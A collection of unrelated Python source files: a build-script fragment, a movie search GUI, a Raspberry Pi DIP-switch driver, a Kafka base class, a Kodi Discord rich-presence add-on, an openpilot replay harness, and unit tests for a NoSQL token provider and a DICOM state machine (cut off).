vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
Search.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import webbrowser
from Da import ResZmz
from Da import ResVhao
from View import ResultView
import urllib
class Search :
def __init__ (self, master) :
self.master = master
self.ResWindow = ResultView.GUI(self.master)
def showResult (self, key) :
searchKey = key.get()
self.ResWindow.showList(searchKey)
self.ResWindow.listRst = ''
data = ''
self.ResWindow.getDetail = lambda data = data : self.__searchMovDetails(data)
threading.Thread(target = lambda key = searchKey : self.__searchMov(key)).start()
self.ResWindow.updateList()
def __searchMov (self, key) :
# 开启两重匹配找寻
self.mainSearcher = ResZmz.Searcher()
self.subSearcher = ResVhao.Searcher()
mainResult = self.mainSearcher.find(key)
subResult = self.subSearcher.find(key)
mainResult.append({'title':'\n--------以下为低质量资源:--------\n','url':''})
mainResult.extend(subResult)
self.ResWindow.listRst = mainResult
def __searchMovDetails (self, data):
self.ResWindow.resRst = ''
self.ResWindow.showRes()
# 开启多线程
threading.Thread(target = lambda data = data : self.__getDetails(data)).start()
self.ResWindow.updateRes()
def __getDetails (self, data) :
if data['url'] != '' :
if data['source'] == 'zmz' :
result = self.mainSearcher.getLink(data['url'])
else :
result = self.subSearcher.getLink(data['url'])
self.ResWindow.resRst = result
|
dip_switch_2bit.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import RPi.GPIO as GPIO
import time
from threading import Thread
class DipSwitch2Bit(object):
'''
Dip switch (2bit) class
'''
__pins = []
__real_true = GPIO.HIGH
__status = []
__observers = []
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the dip switch
:param pin: pin numbers in array
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
for p in pins:
self.__status.append(not real_true)
if self.__real_true:
self.__status[0] = GPIO.input(self.__pins[0])
self.__status[1] = GPIO.input(self.__pins[1])
else:
self.__status[0] = not GPIO.input(self.__pins[0])
self.__status[1] = not GPIO.input(self.__pins[1])
GPIO.add_event_detect(self.__pins[0], GPIO.BOTH, callback = self.make_event, bouncetime = 50)
GPIO.add_event_detect(self.__pins[1], GPIO.BOTH, callback = self.make_event, bouncetime = 50)
try:
t1 = Thread(target = self.watching)
t1.setDaemon(True)
except:
print("Error: Unable to start thread by DipSwitch")
#Stauts.
@property
def is_on(self):
'''
Get the status of each bit
:return: the status array
'''
return self.__status
#Events
def register(self, observer):
if observer not in self.__observers:
self.__observers.append(observer)
def deregister(self, observer):
if observer in self.__observers:
self.__observers.remove(observer)
def notify_observers(self):
for o in self.__observers:
#o.update(self.__status)
o.on_dip_switch_2bit_status_changed(self.__status)
def status_changed(self):
self.notify_observers()
def make_event(self, channel):
if self.__real_true:
if GPIO.input(self.__pins[0]) != self.__status[0]:
self.__status[0] = GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) != self.__status[1]:
self.__status[1] = GPIO.input(self.__pins[1])
self.status_changed()
else:
if GPIO.input(self.__pins[0]) == self.__status[0]:
self.__status[0] = not GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) == self.__status[1]:
self.__status[1] = not GPIO.input(self.__pins[1])
self.status_changed()
def watching(self):
if self.__real_true:
while True:
if GPIO.input(self.__pins[0]) != self.__status[0]:
self.__status[0] = GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) != self.__status[1]:
self.__status[1] = GPIO.input(self.__pins[1])
self.status_changed()
time.sleep(0.05)
else:
while True:
if GPIO.input(self.__pins[0]) == self.__status[0]:
self.__status[0] = not GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) == self.__status[1]:
self.__status[1] = not GPIO.input(self.__pins[1])
self.status_changed()
time.sleep(0.05)
|
kafka_interface.py
|
import asyncio
import threading
from abc import ABC, abstractmethod
from copy import copy
class KafkaInterface(ABC):
def __init__(self):
self._loop = asyncio.get_event_loop()
self._cancelled = False
self._poll_thread = threading.Thread(target=self._poll_loop)
self._is_connected = False
self._lock = threading.Lock()
# Call self._poll_thread.start() in child constructor
@abstractmethod
def _poll_loop(self):
pass
@property
def connected(self):
with self._lock:
return_status = copy(self._is_connected)
return return_status
@connected.setter
def connected(self, is_connected):
with self._lock:
self._is_connected = is_connected
def close(self):
self._cancelled = True
self._poll_thread.join()
|
default.py
|
import xbmc, xbmcaddon
import json
import time
import re
import requests
#SERVER CUSTOM SCRIPT
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = "" #Host IP example 192.168.0.22
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
running = False
def log(msg):
xbmc.log("[Discord RP] " + msg)
DISCORD_CLIENT_ID = '0'
CLIENT_ID = ['544620244014989312',
'570950300446359552']
def getShowImage(showTitle):
if showTitle in AVAIABLE_IMAGES:
return AVAIABLE_IMAGES[showTitle]
return "default"
def removeKodiTags(text):
log("Removing tags for: " + text)
validTags = ["I", "B", "LIGHT", "UPPERCASE", "LOWERCASE", "CAPITALIZE", "COLOR"]
for tag in validTags:
r = re.compile("\[\s*/?\s*"+tag+"\s*?\]")
text = r.sub("", text)
r = re.compile("\[\s*/?\s*CR\s*?\]")
text = r.sub(" ", text)
r = re.compile("\[\s*/?\s*COLOR\s*?.*?\]")
text = r.sub("", text)
log("Removed tags. Result: " + text)
return text
class ServiceRichPresence:
def __init__(self):
self.presence = None
self.settings = {}
self.paused = True
self.connected = False
self.updateSettings()
self.clientId = self.settings['client_id']
def setPauseState(self, state):
self.paused = state
def updateSettings(self):
self.settings = {}
self.settings['large_text'] = "Kodi"
addon = xbmcaddon.Addon()
self.settings['episode_state'] = addon.getSettingInt('episode_state')
self.settings['episode_details'] = addon.getSettingInt('episode_details')
self.settings['movie_state'] = addon.getSettingInt('movie_state')
self.settings['movie_details'] = addon.getSettingInt('movie_details')
self.settings['inmenu'] = addon.getSettingBool('inmenu')
self.settings['client_id'] = addon.getSettingInt('client_id')
# get setting
log(str(self.settings))
def gatherData(self):
player = xbmc.Player()
if player.isPlayingVideo():
return player.getVideoInfoTag()
return None
def craftNoVideoState(self, data):
if self.settings['inmenu']:
activity = {'assets' : {'large_image' : 'default',
'large_text' : self.settings['large_text']},
'state' : (self.settings['inmenu'] and 'In menu' or '')
}
return activity
else:
return None
def getEpisodeState(self, data):
if self.settings['episode_state'] == 0:
return '{}x{:02} {}'.format(data.getSeason(),data.getEpisode(),removeKodiTags(data.getTitle()))
if self.settings['episode_state'] == 1:
return data.getTVShowTitle()
if self.settings['episode_state'] == 2:
return data.getGenre()
return None
def getEpisodeDetails(self, data):
if self.settings['episode_details'] == 0:
return data.getTVShowTitle()
if self.settings['episode_details'] == 1:
return '{}x{:02} {}'.format(data.getSeason(),data.getEpisode(),removeKodiTags(data.getTitle()))
if self.settings['episode_details'] == 2:
return data.getGenre()
return None
def craftEpisodeState(self, data):
activity = {}
activity['assets'] = {'large_image' : getShowImage(data.getTVShowTitle()),
'large_text' : data.getTVShowTitle()}
state = self.getEpisodeState(data)
if state:
activity['state'] = state
details = self.getEpisodeDetails(data)
if details:
activity['details'] = details
return activity
def getMovieState(self, data):
if self.settings['movie_state'] == 0:
return data.getGenre()
if self.settings['movie_state'] == 1:
return removeKodiTags(data.getTitle())
return None
def getMovieDetails(self, data):
if self.settings['movie_details'] == 0:
return removeKodiTags(data.getTitle())
if self.settings['movie_details'] == 1:
return data.getGenre()
return None
def craftMovieState(self, data):
activity = {}
activity['assets'] = {'large_image' : 'default',
'large_text' : removeKodiTags(data.getTitle())}
state = self.getMovieState(data)
if state:
activity['state'] = state
details = self.getMovieDetails(data)
if details:
activity['details'] = details
return activity
def craftVideoState(self, data):
activity = {}
title = data.getTitle() or data.getTagLine() or data.getFile()
title = removeKodiTags(title)
activity['assets'] = {'large_image' : 'default',
'large_text' : title }
activity['details'] = title
return activity
def mainLoop(self):
while True:
monitor.waitForAbort(5)
if monitor.abortRequested():
break
self.updatePresence()
log("Abort called. Exiting...")
if self.connected:
try:
global running,client
running = False
if client:
client.close()
server.close()
except IOError as e:
self.connected = False
log("Error closing connection: " + str(e))
def updatePresence(self):
self.connected = True
if self.connected:
data = self.gatherData()
activity = None
#activity['assets'] = {'large_image' : 'default',
# 'large_text' : self.settings['large_text']}
if not data:
# no video playing
log("Setting default")
if self.settings['inmenu']:
activity = self.craftNoVideoState(data)
else:
if data.getMediaType() == 'episode':
activity = self.craftEpisodeState(data)
elif data.getMediaType() == 'movie':
activity = self.craftMovieState(data)
elif data.getMediaType() == 'video':
activity = self.craftVideoState(data)
else:
activity = self.craftVideoState(data)
log("Unsupported media type: "+str(data.getMediaType()))
log("Using workaround")
if self.paused:
activity['assets']['small_image'] = 'paused'
# Works for
# xx:xx/xx:xx
# xx:xx/xx:xx:xx
# xx:xx:xx/xx:xx:xx
currentTime = player.getTime()
hours = int(currentTime/3600)
minutes = int(currentTime/60) - hours*60
seconds = int(currentTime) - minutes*60 - hours*3600
fullTime = player.getTotalTime()
fhours = int(fullTime/3600)
fminutes = int(fullTime/60) - fhours*60
fseconds = int(fullTime) - fminutes*60 - fhours*3600
activity['assets']['small_text'] = "{}{:02}:{:02}/{}{:02}:{:02}".format('{}:'.format(hours) if hours>0 else '',
minutes,
seconds,
'{}:'.format(fhours) if fhours>0 else '',
fminutes,
fseconds
)
else:
currentTime = player.getTime()
fullTime = player.getTotalTime()
remainingTime = fullTime - currentTime
activity['timestamps'] = {'end' : int(time.time()+remainingTime)}
if activity == None:
try:
self.presence.clear_activity()
except Exception as e:
log("Error while clearing: " + str(e))
else:
if self.settings['client_id'] != self.clientId:
pass
else:
log("Activity set: " + str(activity))
global client
try:
if client:
client.sendall(bytes(str(activity),'utf-8'))
except:
client = None
class MyPlayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
def onPlayBackPaused(self):
drp.setPauseState(True)
drp.updatePresence()
def onAVChange(self):
drp.updatePresence()
def onAVStarted(self):
drp.setPauseState(False)
drp.updatePresence()
def onPlayBackEnded(self):
drp.setPauseState(True)
drp.updatePresence()
def onPlayBackResumed(self):
drp.setPauseState(False)
drp.updatePresence()
def onPlayBackError(self):
drp.setPauseState(True)
drp.updatePresence()
def onPlayBackSeek(self, *args):
drp.updatePresence()
def onPlayBackSeekChapter(self, *args):
drp.updatePresence()
def onPlayBackStarted(self):
drp.setPauseState(False)
# media might not be loaded
drp.updatePresence()
def onPlayBackStopped(self):
drp.setPauseState(True)
drp.updatePresence()
class MyMonitor(xbmc.Monitor):
def __init__(self):
xbmc.Monitor.__init__(self)
log("Monitor initialized")
def onSettingsChanged(self):
drp.updateSettings()
drp.updatePresence()
AVAIABLE_IMAGES = []
try:
AVAIABLE_IMAGES = json.loads(requests.get("https://hiumee.github.io/kodi/custom.json").text)
except Exception:
pass
client = None
def handle_client(conn, addr):
try:
connected = True
while connected:
msg = conn.recv(1024).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
global client
client = None
except:
pass
def start():
global running
running = True
server.listen()
xbmc.log(f"[LISTENING] Server is listening on {SERVER}")
global client
while running:
try:
conn, addr = server.accept()
client = conn
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
except:
server.close()
server_Thread = threading.Thread(target=start, args=())
server_Thread.start()
monitor = MyMonitor()
player = MyPlayer()
drp = ServiceRichPresence()
drp.updatePresence()
drp.mainLoop()
|
process_replay.py
|
#!/usr/bin/env python3
import os
import sys
import threading
import importlib
if "CI" in os.environ:
tqdm = lambda x: x
else:
from tqdm import tqdm
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
dat = messaging.new_message()
dat.init(s)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services):
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
data = messaging.new_message()
try:
data.init(s)
except:
data.init(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = ["liveCalibration"] if (fsm.frame + 1) % 5 == 0 else []
return recv_socks, True
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "plan": [], "pathPlan": [], "gpsLocation": [],
"model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("controlsState.startMonoTime", 0), ("controlsState.cumLagMs", 0)],
init_callback=fingerprint,
should_recv_callback=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("radarState.cumLagMs", 0)],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("plan.processingDelay", 0)],
init_callback=get_car_params,
should_recv_callback=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"cameraOdometry": ["liveCalibration"]
},
ignore=[("logMonoTime", 0), ("valid", True)],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
),
#ProcessConfig(
# proc_name="dmonitoringd",
# pub_sub={
# "driverState": ["dMonitoringState"],
# "liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
# },
# ignore=[("logMonoTime", 0), ("valid", True)],
# init_callback=get_car_params,
# should_recv_callback=None,
#),
]
def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
|
store_at_provider.py
|
#
# Copyright (c) 2018, 2021 Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Universal Permissive License v 1.0 as shown at
# https://oss.oracle.com/licenses/upl/
#
import unittest
from requests import codes
from socket import error
from threading import Thread
from time import sleep, time
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from borneo import IllegalArgumentException
from borneo.kv import StoreAccessTokenProvider
class TestStoreAccessTokenProvider(unittest.TestCase):
@classmethod
def setUpClass(cls):
global LOGIN_PATH, LOGOUT_PATH, RENEW_PATH
LOGIN_PATH = '/V2/nosql/security/login'
LOGOUT_PATH = '/V2/nosql/security/logout'
RENEW_PATH = '/V2/nosql/security/renew'
# basicAuthString matching user name test and password NoSql00__123456
global USER_NAME, PASSWORD, BASIC_AUTH_STRING
USER_NAME = 'test'
PASSWORD = 'NoSql00__123456'
BASIC_AUTH_STRING = 'Basic dGVzdDpOb1NxbDAwX18xMjM0NTY='
global AUTH_TOKEN_PREFIX, LOGIN_TOKEN, RENEW_TOKEN
AUTH_TOKEN_PREFIX = 'Bearer '
LOGIN_TOKEN = 'LOGIN_TOKEN'
RENEW_TOKEN = 'RENEW_TOKEN'
global PORT
PORT = cls._find_port_start_server(TokenHandler)
@classmethod
def tearDownClass(cls):
if cls.httpd is not None:
cls.httpd.shutdown()
cls.httpd.server_close()
cls.httpd = None
def setUp(self):
self.base = 'https://localhost:' + str(PORT)
self.token_provider = None
def tearDown(self):
if self.token_provider is not None:
self.token_provider.close()
self.token_provider = None
def testAccessTokenProviderIllegalInit(self):
# illegal user name
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
{'user_name': USER_NAME}, PASSWORD)
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
'', PASSWORD)
# illegal password
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
USER_NAME, {'password': PASSWORD})
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
USER_NAME, '')
# one of the required parameters is None
self.assertRaises(IllegalArgumentException, StoreAccessTokenProvider,
None, PASSWORD)
def testAccessTokenProviderSetIllegalAutoRenew(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.set_auto_renew, 'IllegalRenew')
def testAccessTokenProviderSetIllegalEndpoint(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, None)
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
{'endpoint': self.base})
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'localhost:notanint')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'localhost:-1')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'localhost:8080')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'ttp://localhost')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint, 'http://localhost')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'localhost:8080:foo')
self.assertRaises(IllegalArgumentException,
self.token_provider.set_endpoint,
'https://localhost:-1:x')
def testAccessTokenProviderSetIllegalLogger(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.set_logger, 'IllegalLogger')
def testAccessTokenProviderGetAuthorizationStringWithIllegalRequest(self):
self.token_provider = StoreAccessTokenProvider()
self.assertRaises(IllegalArgumentException,
self.token_provider.get_authorization_string,
'IllegalRequest')
def testAccessTokenProviderGets(self):
base = 'https://localhost:80'
self.token_provider = StoreAccessTokenProvider(
USER_NAME, PASSWORD).set_auto_renew(False).set_endpoint(base)
self.assertTrue(self.token_provider.is_secure())
self.assertFalse(self.token_provider.is_auto_renew())
self.assertEqual(self.token_provider.get_endpoint(), base)
self.assertIsNone(self.token_provider.get_logger())
def testAccessTokenProviderGetAuthorizationString(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.token_provider.set_endpoint(self.base)
self.token_provider.set_url_for_test()
# get authorization string.
result = self.token_provider.get_authorization_string()
self.assertIsNotNone(result)
self.assertTrue(result.startswith(AUTH_TOKEN_PREFIX))
self.assertEqual(result[len(AUTH_TOKEN_PREFIX):], LOGIN_TOKEN)
# Wait for the refresh to complete
sleep(10)
result = self.token_provider.get_authorization_string()
self.assertEqual(result[len(AUTH_TOKEN_PREFIX):], RENEW_TOKEN)
self.token_provider.close()
self.assertIsNone(self.token_provider.get_authorization_string())
def testAccessTokenProviderMultiThreads(self):
self.token_provider = StoreAccessTokenProvider(USER_NAME, PASSWORD)
self.token_provider.set_endpoint(self.base)
self.token_provider.set_url_for_test()
threads = list()
for i in range(5):
t = Thread(target=self._run)
t.start()
threads.append(t)
for t in threads:
t.join()
@classmethod
def _find_port_start_server(cls, token_handler):
port = 9000
while True:
try:
cls.httpd = TCPServer(('', port), token_handler)
except error:
port += 1
else:
break
thread = Thread(target=cls.httpd.serve_forever)
thread.setDaemon(True)
thread.start()
return port
def _run(self):
try:
for i in range(5):
self.token_provider.bootstrap_login()
finally:
self.token_provider.close()
class TokenHandler(SimpleHTTPRequestHandler, object):
def do_GET(self):
rawpath = self.path.split('?')[0]
auth_string = self.headers['Authorization']
if rawpath == LOGIN_PATH:
assert auth_string == BASIC_AUTH_STRING
self._generate_login_token(LOGIN_TOKEN)
elif rawpath == RENEW_PATH:
assert auth_string.startswith(AUTH_TOKEN_PREFIX)
self._generate_login_token(RENEW_TOKEN)
elif rawpath == LOGOUT_PATH:
assert auth_string.startswith(AUTH_TOKEN_PREFIX)
self.send_response(codes.ok)
def log_request(self, code='-', size='-'):
pass
def _generate_login_token(self, token_text):
expire_time = int(round(time() * 1000)) + 15000
content = ('{"token": "' + token_text + '", "expireAt": ' +
str(expire_time) + '}')
self.send_response(codes.ok)
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content.encode())
if __name__ == '__main__':
unittest.main()
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .dummy_c_scp import DummyVerificationSCP, DummyBaseSCP
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
